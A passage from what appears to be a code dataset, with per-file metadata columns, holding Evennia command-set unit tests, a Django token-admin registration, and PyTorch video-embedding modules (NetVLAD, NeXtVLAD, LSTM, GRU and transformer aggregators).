def test_forward_sameprio_duplicate(self):
"""
Test of `duplicates` transfer which does not propagate.
C.duplication=True, merges later than A
D + B = DB (no duplication, DB.duplication=None)
DB + A = DBA (duplication, DBA.duplication=None)
DBA + C = final (duplication, final.duplication=None)
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
c.duplicates = True
cmdset_f = d + b + a + c # two last mergers duplicates=True
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 10)
def test_reverse_sameprio_duplicate_reverse(self):
"""
Test of `duplicates` transfer which does not propagate.
C.duplication=False (explicit), merges before A. This behavior is the
same as if C.duplication=None, since A merges later and takes
precedence.
D + B = DB (no duplication, DB.duplication=None)
DB + C = DBC (no duplication, DBC.duplication=None)
DBC + A = final (duplication, final.duplication=None)
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
c.duplicates = False
cmdset_f = d + b + c + a # a merges last, takes precedence
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 8)
def test_reverse_sameprio_duplicate_forward(self):
"""
Test of `duplicates` transfer which does not propagate.
C.duplication=False (explicit), merges after A. This just means
only A causes duplicates, earlier in the chain.
D + B = DB (no duplication, DB.duplication=None)
DB + A = DBA (duplication, DBA.duplication=None)
DBA + C = final (no duplication, final.duplication=None)
Note that DBA has 8 cmds due to A merging onto DB with duplication,
but since C merges onto this with no duplication, the union will hold
6 commands, since C has two commands that replaces the 4 duplicates
with uniques copies from C.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
c.duplicates = False
cmdset_f = d + b + a + c # a merges before c
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 6)
class TestOptionTransferReplace(TestCase):
"""
Test option transfer through more complex merge types.
"""
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
self.cmdset_a.priority = 0
self.cmdset_b.priority = 0
self.cmdset_c.priority = 0
self.cmdset_d.priority = 0
self.cmdset_a.no_exits = True
self.cmdset_a.no_objs = True
self.cmdset_a.no_channels = True
self.cmdset_a.duplicates = True
def test_option_transfer__replace_reverse_highprio(self):
"""
A has all options True and highest priority. C has them False and is
Replace-type.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
c.mergetype = "Replace"
c.no_channels = False
c.no_exits = False
c.no_objs = False
c.duplicates = False
d.priority = -1
cmdset_f = d + c + b + a # reverse, A high prio, C Replace
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 7)
def test_option_transfer__replace_reverse_highprio_from_false(self):
"""
Inverse of previous test: A has all options False and highest priority.
C has them True and is Replace-type.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.no_exits = False
a.no_objs = False
a.no_channels = False
a.duplicates = False
a.priority = 2
b.priority = 2
c.priority = 0
c.mergetype = "Replace"
c.no_channels = True
c.no_exits = True
c.no_objs = True
c.duplicates = True
d.priority = -1
cmdset_f = d + c + b + a # reverse, A high prio, C Replace
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
# test cmdhandler functions
import sys
from evennia.commands import cmdhandler
from twisted.trial.unittest import TestCase as TwistedTestCase
def _mockdelay(time, func, *args, **kwargs):
return func(*args, **kwargs)
class TestGetAndMergeCmdSets(TwistedTestCase, BaseEvenniaTest):
"Test the cmdhandler.get_and_merge_cmdsets function."
def setUp(self):
self.patch(sys.modules["evennia.server.sessionhandler"], "delay", _mockdelay)
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
def set_cmdsets(self, obj, *args):
"Set cmdets on obj in the order given in *args"
for cmdset in args:
obj.cmdset.add(cmdset)
def test_from_session(self):
a = self.cmdset_a
a.no_channels = True
self.set_cmdsets(self.session, a)
deferred = cmdhandler.get_and_merge_cmdsets(
self.session, self.session, None, None, "session", ""
)
def _callback(cmdset):
self.assertEqual(cmdset.key, "A")
deferred.addCallback(_callback)
return deferred
def test_from_account(self):
from evennia.commands.default.cmdset_account import AccountCmdSet
a = self.cmdset_a
a.no_channels = True
self.set_cmdsets(self.account, a)
deferred = cmdhandler.get_and_merge_cmdsets(
self.account, None, self.account, None, "account", ""
)
# get_and_merge_cmdsets converts to lower-case internally.
def _callback(cmdset):
pcmdset = AccountCmdSet()
pcmdset.at_cmdset_creation()
pcmds = [cmd.key for cmd in pcmdset.commands] + ["a", "b", "c", "d"]
self.assertTrue(all(cmd.key in pcmds for cmd in cmdset.commands))
# _callback = lambda cmdset: self.assertEqual(sum(1 for cmd in cmdset.commands if cmd.key in ("a", "b", "c", "d")), 4)
deferred.addCallback(_callback)
return deferred
def test_from_object(self):
self.set_cmdsets(self.obj1, self.cmdset_a)
deferred = cmdhandler.get_and_merge_cmdsets(self.obj1, None, None, self.obj1, "object", "")
# get_and_merge_cmdsets converts to lower-case internally.
def _callback(cmdset):
return self.assertEqual(
sum(1 for cmd in cmdset.commands if cmd.key in ("a", "b", "c", "d")), 4
)
deferred.addCallback(_callback)
return deferred
def test_multimerge(self):
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.no_exits = True
a.no_channels = True
self.set_cmdsets(self.obj1, a, b, c, d)
deferred = cmdhandler.get_and_merge_cmdsets(self.obj1, None, None, self.obj1, "object", "")
def _callback(cmdset):
self.assertTrue(cmdset.no_exits)
self.assertTrue(cmdset.no_channels)
self.assertEqual(cmdset.key, "D")
deferred.addCallback(_callback)
return deferred
def test_duplicates(self):
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.no_exits = True
a.no_channels = True
b.duplicates = True
d.duplicates = True
self.set_cmdsets(self.obj1, a, b, c, d)
deferred = cmdhandler.get_and_merge_cmdsets(self.obj1, None, None, self.obj1, "object", "")
def _callback(cmdset):
self.assertEqual(len(cmdset.commands), 9)
deferred.addCallback(_callback)
return deferred
class AccessableCommand(Command):
def access(*args, **kwargs):
return True
class _CmdTest1(AccessableCommand):
key = "test1"
arg_regex = None
class _CmdTest2(AccessableCommand):
key = "another command"
arg_regex = None
class _CmdTest3(AccessableCommand):
key = "&the third command"
arg_regex = None
class _CmdTest4(AccessableCommand):
key = "test2"
arg_regex = None
class _CmdSetTest(CmdSet):
key = "test_cmdset"
def at_cmdset_creation(self):
self.add(_CmdTest1)
self.add(_CmdTest2)
self.add(_CmdTest3)
class TestCmdParser(TestCase):
def test_create_match(self):
class DummyCmd:
pass
dummy = DummyCmd()
self.assertEqual(
cmdparser.create_match("look at", "look at target", dummy, "look"),
("look at", " target", dummy, 7, 0.5, "look"),
)
@override_settings(CMD_IGNORE_PREFIXES="@&/+")
def test_build_matches(self):
a_cmdset = _CmdSetTest()
bcmd = [cmd for cmd in a_cmdset.commands if cmd.key == "test1"][0]
# normal parsing
self.assertEqual(
cmdparser.build_matches("test1 rock", a_cmdset, include_prefixes=False),
[("test1", " rock", bcmd, 5, 0.5, "test1")],
)
# test prefix exclusion
bcmd = [cmd for cmd in a_cmdset.commands if cmd.key == "another command"][0]
self.assertEqual(
cmdparser.build_matches(
"@another command smiles to me ", a_cmdset, include_prefixes=False
),
[("another command", " smiles to me ", bcmd, 15, 0.5, "another command")],
)
# test prefix exclusion on the cmd class
bcmd = [cmd for cmd in a_cmdset.commands if cmd.key == "&the third command"][0]
self.assertEqual(
cmdparser.build_matches("the third command", a_cmdset, include_prefixes=False),
[("the third command", "", bcmd, 17, 1.0, "&the third command")],
)
@override_settings(SEARCH_MULTIMATCH_REGEX=r"(?P<number>[0-9]+)-(?P<name>.*)")
def test_num_differentiators(self):
self.assertEqual(cmdparser.try_num_differentiators("look me"), (None, None))
self.assertEqual(cmdparser.try_num_differentiators("look me-3"), (3, "look me"))
self.assertEqual(cmdparser.try_num_differentiators("look me-567"), (567, "look me"))
@override_settings(
SEARCH_MULTIMATCH_REGEX=r"(?P<number>[0-9]+)-(?P<name>.*)", CMD_IGNORE_PREFIXES="@&/+"
)
def test_cmdparser(self):
a_cmdset = _CmdSetTest()
bcmd = [cmd for cmd in a_cmdset.commands if cmd.key == "test1"][0]
self.assertEqual(
cmdparser.cmdparser("test1hello", a_cmdset, None),
[("test1", "hello", bcmd, 5, 0.5, "test1")],
)
class TestCmdSetNesting(BaseEvenniaTest):
"""
Test 'nesting' of cmdsets by adding
"""
def test_nest(self):
class CmdA(Command):
key = "a"
def func(self):
self.msg(str(self.obj))
class CmdSetA(CmdSet):
def at_cmdset_creation(self):
self.add(CmdA)
class CmdSetB(CmdSet):
def at_cmdset_creation(self):
self.add(CmdSetA)
cmd = self.char1.cmdset.cmdset_stack[-1].commands[0]
self.assertEqual(cmd.obj, self.char1)
| 37.634775
| 126
| 0.631563
| 6,346
| 45,237
| 4.334699
| 0.053104
| 0.063872
| 0.027483
| 0.008143
| 0.864076
| 0.841064
| 0.835648
| 0.824778
| 0.800967
| 0.798931
| 0
| 0.008992
| 0.272299
| 45,237
| 1,201
| 127
| 37.666112
| 0.826635
| 0.234609
| 0
| 0.783611
| 0
| 0
| 0.025564
| 0.003704
| 0
| 0
| 0
| 0
| 0.279129
| 1
| 0.096031
| false
| 0.021767
| 0.011524
| 0.003841
| 0.172855
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f3cb30d86c5c85adcae719bbbd7b32d3898f2dc
| 204
|
py
|
Python
|
client/admin.py
|
goldentoaste/authentication-lab
|
6b139d79e40ccf5ac053019c09f11e1c6ac8d4a5
|
[
"MIT"
] | null | null | null |
client/admin.py
|
goldentoaste/authentication-lab
|
6b139d79e40ccf5ac053019c09f11e1c6ac8d4a5
|
[
"MIT"
] | null | null | null |
client/admin.py
|
goldentoaste/authentication-lab
|
6b139d79e40ccf5ac053019c09f11e1c6ac8d4a5
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from rest_framework.authtoken.admin import TokenAdmin
from rest_framework.authtoken.models import Token
TokenAdmin.raw_id_fields = ('user',)
| 29.142857
| 53
| 0.828431
| 28
| 204
| 5.892857
| 0.642857
| 0.09697
| 0.206061
| 0.315152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102941
| 204
| 7
| 54
| 29.142857
| 0.901639
| 0.127451
| 0
| 0
| 0
| 0
| 0.022599
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4f3ea3918aa344407e64c97592c457f06b5e559e
| 79,457
|
py
|
Python
|
model.py
|
glee1228/segment_temporal_context_aggregation
|
e5778f848f1cfd89bd1f77beb5e1b38a66a2f13d
|
[
"Apache-2.0"
] | 1
|
2022-03-15T18:17:45.000Z
|
2022-03-15T18:17:45.000Z
|
model.py
|
glee1228/segment_temporal_context_aggregation
|
e5778f848f1cfd89bd1f77beb5e1b38a66a2f13d
|
[
"Apache-2.0"
] | null | null | null |
model.py
|
glee1228/segment_temporal_context_aggregation
|
e5778f848f1cfd89bd1f77beb5e1b38a66a2f13d
|
[
"Apache-2.0"
] | null | null | null |
import copy
import math
import numpy as np
import horovod.torch as hvd
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset
from torchvision import models
#
# class NetVLAD(nn.Module):
# """NetVLAD layer implementation"""
#
# def __init__(self, feature_size, num_clusters=256, output_dim=1024, normalize_input=True, alpha=1.0, drop_rate=0.5, gating_reduction=8):
# super(NetVLAD, self).__init__()
# self.feature_size = feature_size
# self.num_clusters = num_clusters
# self.normalize_input = normalize_input
# self.alpha = alpha
#
# self.bn1 = nn.BatchNorm1d(feature_size)
# self.conv = nn.Conv1d(feature_size, num_clusters,
# kernel_size=1, bias=True)
# self.centroids = nn.Parameter(torch.rand(num_clusters, feature_size))
#
# self.bn2 = nn.BatchNorm1d(feature_size * num_clusters)
# self.drop = nn.Dropout(drop_rate)
#
# self.fc1 = nn.Linear(feature_size * num_clusters, output_dim)
# self.bn3 = nn.BatchNorm1d(output_dim)
# self.fc2 = nn.Linear(output_dim, output_dim // gating_reduction)
# self.bn4 = nn.BatchNorm1d(output_dim // gating_reduction)
# self.fc3 = nn.Linear(output_dim // gating_reduction, output_dim)
# self._init_params()
#
# def _init_params(self):
# self.conv.weight = nn.Parameter(
# (2.0 * self.alpha * self.centroids).unsqueeze(-1)
# )
# self.conv.bias = nn.Parameter(
# - self.alpha * self.centroids.norm(dim=1)
# )
#
# def forward(self, x, num_frames):
# N, C, T = x.shape[:3] # (N, C, T)
# # mask padded frame feature
# if len(num_frames.shape) == 1:
# num_frames = num_frames.unsqueeze(1)
# frame_mask = (
# 0 < num_frames - torch.arange(0, T).cuda()
# ).float() # (N, T)
#
# assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
#
# x = self.bn1(x)
# if self.normalize_input:
# x = F.normalize(x, p=2, dim=1) # across descriptor dim
#
# # soft-assignment
# soft_assign = self.conv(x) # (N, num_clusters, T)
# soft_assign = F.softmax(soft_assign, dim=1) # (N, num_clusters, T)
# soft_assign = soft_assign * frame_mask.unsqueeze(1)
#
# soft_assign_sum = torch.sum(
# soft_assign, dim=-1, keepdim=True) # (N, num_clusters, 1)
# # (N, num_clusters, feature_size)
# centervlad = self.centroids * soft_assign_sum
#
# x_flatten = x.view(N, C, -1) # (N, feature_size, T)
# # (N, num_clusters, feature_size)
# vlad = torch.bmm(soft_assign, x_flatten.transpose(1, 2))
# vlad -= centervlad # (N, num_clusters, feature_size)
#
# # intra-normalization (N, num_clusters, feature_size)
# vlad = F.normalize(vlad, p=2, dim=2)
# # flatten (N, num_clusters * feature_size)
# vlad = vlad.view(x.size(0), -1)
# vlad = self.bn2(vlad)
#
# vlad = self.drop(vlad)
#
# activation = self.bn3(self.fc1(vlad)) # (N, output_dim)
#
# # (N, output_dim // gating_reduction)
# gates = F.relu(self.bn4(self.fc2(activation)))
# gates = torch.sigmoid(self.fc3(gates)) # (N, output_dim)
#
# activation = activation * gates # (N, output_dim)
# # L2 normalize (N, num_clusters * feature_size)
# vlad = F.normalize(activation, p=2, dim=1)
#
# # L2 normalize (N, output_dim) IMPORTANT!!!
# embedding = F.normalize(vlad, p=2, dim=1)
#
# return embedding # (N, output_dim)
#
# def encode(self, x, num_frames):
# N, C, T = x.shape[:3] # (N, C, T)
# # mask padded frame feature
# if len(num_frames.shape) == 1:
# num_frames = num_frames.unsqueeze(1)
# frame_mask = (
# 0 < num_frames - torch.arange(0, T).cuda()
# ).float() # (N, T)
#
# assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# x = self.bn1(x)
# if self.normalize_input:
# x = F.normalize(x, p=2, dim=1) # across descriptor dim
#
# # soft-assignment
# soft_assign = self.conv(x) # (N, num_clusters, T)
# soft_assign = F.softmax(soft_assign, dim=1) # (N, num_clusters, T)
# soft_assign = soft_assign * frame_mask.unsqueeze(1)
#
# soft_assign_sum = torch.sum(
# soft_assign, dim=-1, keepdim=True) # (N, num_clusters, 1)
# # (N, num_clusters, feature_size)
# centervlad = self.centroids * soft_assign_sum
#
# x_flatten = x.view(N, C, -1) # (N, feature_size, T)
# # (N, num_clusters, feature_size)
# vlad = torch.bmm(soft_assign, x_flatten.transpose(1, 2))
# vlad -= centervlad # (N, num_clusters, feature_size)
#
# # intra-normalization (N, num_clusters, feature_size)
# vlad = F.normalize(vlad, p=2, dim=2)
# return vlad
class NetVLAD(nn.Module):
def __init__(self, dims, num_clusters, outdims=None):
super(NetVLAD, self).__init__()
self.num_clusters = num_clusters
self.dims = dims
self.centroids = nn.Parameter(torch.randn(num_clusters, dims) / math.sqrt(self.dims))
self.conv = nn.Conv2d(dims, num_clusters, kernel_size=1, bias=False)
if outdims is not None:
self.outdims = outdims
self.reduction_layer = nn.Linear(self.num_clusters * self.dims, self.outdims, bias=False)
else:
self.outdims = self.num_clusters * self.dims
self.norm = nn.LayerNorm(self.outdims)
self.reset_parameters()
def reset_parameters(self):
self.conv.weight = nn.Parameter(self.centroids.detach().clone().unsqueeze(-1).unsqueeze(-1))
if hasattr(self, 'reduction_layer'):
nn.init.normal_(self.reduction_layer.weight, std=1 / math.sqrt(self.num_clusters * self.dims))
def forward(self, x, mask=None, sample=False):
N, C, T, R = x.shape
# soft-assignment
soft_assign = self.conv(x).view(N, self.num_clusters, -1)
soft_assign = F.softmax(soft_assign, dim=1).view(N, self.num_clusters, T, R)
x_flatten = x.view(N, C, -1)
vlad = torch.zeros([N, self.num_clusters, C], dtype=x.dtype, layout=x.layout, device=x.device)
for cluster in range(self.num_clusters): # slower than non-looped, but lower memory usage
residual = x_flatten.unsqueeze(0).permute(1, 0, 2, 3) - self.centroids[cluster:cluster + 1, :]. \
expand(x_flatten.size(-1), -1, -1).permute(1, 2, 0).unsqueeze(0)
residual = residual.view(N, C, T, R)
residual *= soft_assign[:, cluster:cluster + 1, :]
if mask is not None:
residual = residual.masked_fill((1 - mask.unsqueeze(1).unsqueeze(-1)).bool(), 0.0)
vlad[:, cluster:cluster + 1, :] = residual.sum([-2, -1]).unsqueeze(1)
vlad = F.normalize(vlad, p=2, dim=2) # intra-normalization
vlad = vlad.view(x.size(0), -1) # flatten
vlad = F.normalize(vlad, p=2, dim=1) # L2 normalize
if hasattr(self, 'reduction_layer'):
vlad = self.reduction_layer(vlad)
return self.norm(vlad)
class NeXtVLAD(nn.Module):
"""NeXtVLAD layer implementation"""
def __init__(self, feature_size, num_clusters=64, output_dim=1024, normalize_input=True, expansion=2, groups=8, drop_rate=0.5, gating_reduction=8):
super(NeXtVLAD, self).__init__()
self.feature_size = feature_size
self.num_clusters = num_clusters
self.normalize_input = normalize_input
self.expansion = expansion
self.groups = groups
self.conv1 = nn.Conv1d(
feature_size, feature_size * expansion, kernel_size=1, bias=True)
self.conv2 = nn.Conv1d(feature_size * expansion,
groups, kernel_size=1, bias=True)
self.conv3 = nn.Conv1d(feature_size * expansion,
num_clusters * groups, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm1d(num_clusters * groups)
self.centroids = nn.Parameter(torch.rand(
num_clusters, feature_size * expansion // groups))
self.bn2 = nn.BatchNorm1d(
feature_size * expansion // groups * num_clusters)
self.drop = nn.Dropout(drop_rate)
self.fc1 = nn.Linear(feature_size * expansion //
groups * num_clusters, output_dim)
self.bn3 = nn.BatchNorm1d(output_dim)
self.fc2 = nn.Linear(output_dim, output_dim // gating_reduction)
self.bn4 = nn.BatchNorm1d(output_dim // gating_reduction)
self.fc3 = nn.Linear(output_dim // gating_reduction, output_dim)
def forward(self, x, num_frames):
N, C, T = x.shape[:3] # (N, C, T)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
if self.normalize_input:
x = F.normalize(x, p=2, dim=1) # across descriptor dim
x = self.conv1(x) # (N, feature_size * expansion, T)
# attention factor of per group
attention = torch.sigmoid(self.conv2(x)) # (N, groups, T)
attention = attention * frame_mask.unsqueeze(1)
attention = attention.view(N, 1, -1) # (N, 1, groups * T)
# calculate activation factor of per group per cluster
feature_size = self.feature_size * self.expansion // self.groups
activation = self.conv3(x) # (N, num_clusters * groups, T)
activation = self.bn1(activation)
# reshape of activation
# (N, num_clusters, groups * T)
activation = activation.view(N, self.num_clusters, -1)
# softmax on per cluster
# (N, num_clusters, groups * T)
activation = F.softmax(activation, dim=1)
activation = activation * attention # (N, num_clusters, groups * T)
activation_sum = torch.sum(
activation, dim=-1, keepdim=True) # (N, num_clusters, 1)
# (N, num_clusters, feature_size)
centervlad = self.centroids * activation_sum
# (N, feature_size, groups * T)
x_rehaped = x.view(N, feature_size, -1)
vlad = torch.bmm(activation, x_rehaped.transpose(1, 2)
) # (N, num_clusters, feature_size)
vlad -= centervlad # (N, num_clusters, feature_size)
# intra-normalization (N, num_clusters, feature_size)
vlad = F.normalize(vlad, p=2, dim=2)
# flatten (N, num_clusters * feature_size)
vlad = vlad.view(N, -1)
vlad = self.bn2(vlad)
vlad = self.drop(vlad)
activation = self.bn3(self.fc1(vlad)) # (N, output_dim)
# (N, output_dim // gating_reduction)
gates = F.relu(self.bn4(self.fc2(activation)))
gates = torch.sigmoid(self.fc3(gates)) # (N, output_dim)
activation = activation * gates # (N, output_dim)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(activation, p=2, dim=1)
return embedding # (N, output_dim)
def encode(self, x, num_frames):
N, C, T = x.shape[:3] # (N, C, T)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
if self.normalize_input:
x = F.normalize(x, p=2, dim=1) # across descriptor dim
x = self.conv1(x) # (N, feature_size * expansion, T)
# attention factor of per group
attention = torch.sigmoid(self.conv2(x)) # (N, groups, T)
attention = attention * frame_mask.unsqueeze(1)
attention = attention.view(N, 1, -1) # (N, 1, groups * T)
# calculate activation factor of per group per cluster
feature_size = self.feature_size * self.expansion // self.groups
activation = self.conv3(x) # (N, num_clusters * groups, T)
activation = self.bn1(activation)
# reshape of activation
# (N, num_clusters, groups * T)
activation = activation.view(N, self.num_clusters, -1)
# softmax on per cluster
# (N, num_clusters, groups * T)
activation = F.softmax(activation, dim=1)
activation = activation * attention # (N, num_clusters, groups * T)
activation_sum = torch.sum(
activation, dim=-1, keepdim=True) # (N, num_clusters, 1)
# (N, num_clusters, feature_size)
centervlad = self.centroids * activation_sum
# (N, feature_size, groups * T)
x_rehaped = x.view(N, feature_size, -1)
vlad = torch.bmm(activation, x_rehaped.transpose(1, 2)
) # (N, num_clusters, feature_size)
vlad -= centervlad # (N, num_clusters, feature_size)
# intra-normalization (N, num_clusters, feature_size)
vlad = F.normalize(vlad, p=2, dim=2)
return vlad
class LSTMModule(nn.Module):
def __init__(self, feature_size=1024, output_dim=1024, nhid=1024, nlayers=2, dropout=0.2):
super(LSTMModule, self).__init__()
self.feature_size = feature_size
self.nhid = nhid
self.nlayers = nlayers
self.output_dim = output_dim
self.dropout = dropout
self.LSTM = nn.LSTM(
input_size=self.feature_size,
hidden_size=self.nhid,
num_layers=self.nlayers,
dropout=self.dropout,
# input & output will has batch size as 1s dimension. e.g. (batch, time_step, input_size)
batch_first=True,
)
self.bn1 = nn.BatchNorm1d(self.feature_size)
def forward(self, x, num_frames):
x = self.bn1(x)
x = x.transpose(-1, -2)
N, T, C = x.shape[:3] # (N, T, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
self.LSTM.flatten_parameters()
output, (h_n, h_c) = self.LSTM(x, None)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (batch, 1)
output = torch.sum(output, dim=-2) / frame_count
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
return embedding
def encode(self, x, num_frames):
x = self.bn1(x) # (N, C, T)
x = x.transpose(-1, -2)
N, T, C = x.shape[:3] # (N, T, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
self.LSTM.flatten_parameters()
output, (h_n, h_c) = self.LSTM(x, None)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
return output
class GRUModule(nn.Module):
def __init__(self, feature_size=1024, output_dim=1024, nhid=1024, nlayers=2, dropout=0.2):
super(GRUModule, self).__init__()
self.feature_size = feature_size
self.nhid = nhid
self.nlayers = nlayers
self.output_dim = output_dim
self.dropout = dropout
self.GRU = nn.GRU(
input_size=self.feature_size,
hidden_size=self.nhid,
num_layers=self.nlayers,
dropout=self.dropout,
# input & output will has batch size as 1s dimension. e.g. (batch, time_step, input_size)
batch_first=True,
)
self.bn1 = nn.BatchNorm1d(self.feature_size)
def forward(self, x, num_frames):
x = self.bn1(x)
x = x.transpose(-1, -2)
N, T, C = x.shape[:3] # (N, T, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
self.GRU.flatten_parameters()
output, h_n = self.GRU(x, None)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (batch, 1)
output = torch.sum(output, dim=-2) / frame_count
# L2 normalize (N*num_directions, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
return embedding
def encode(self, x, num_frames):
x = self.bn1(x) # (N, C, T)
x = x.transpose(-1, -2)
N, T, C = x.shape[:3] # (N, T, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
self.GRU.flatten_parameters()
output, (h_n, h_c) = self.GRU(x, None)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
return output
class FSTA(nn.Module):
def __init__(self, frame_feature_size=1024,segment_feature_size=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(FSTA, self).__init__()
self.frame_feature_size = frame_feature_size
self.segment_feature_size = segment_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=frame_feature_size,
nhead=nhead,
dim_feedforward=2048,
dropout=dropout
)
encoder_layers2 = nn.TransformerEncoderLayer(
d_model=segment_feature_size,
nhead=nhead,
dim_feedforward=2048,
dropout=dropout
)
self.frame_transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.segment_transformer_encoder = nn.TransformerEncoder(
encoder_layers2, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
x, x2 = torch.split(x, int(x.shape[2]/2),dim=2)
T, N, C = x.shape[:3] # (T, N, C)
T2, N2, C2 = x2.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.frame_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size, C)
output = self.frame_transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = torch.cat((output,x2),2)
output = self.segment_transformer_encoder(
output, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
def encode(self, x, x2, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
x, x2 = torch.split(x, int(x.shape[2]/2),dim=2)
T, N, C = x.shape[:3] # (T, N, C)
T2, N2, C2 = x2.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.frame_feature_size, 'Input should have frame_feature_size {} but got {}.'.format(self.frame_feature_size, C)
assert C2 == self.segment_feature_size, 'Input should have segment_feature_size {} but got {}.'.format(self.segment_feature_size, C2)
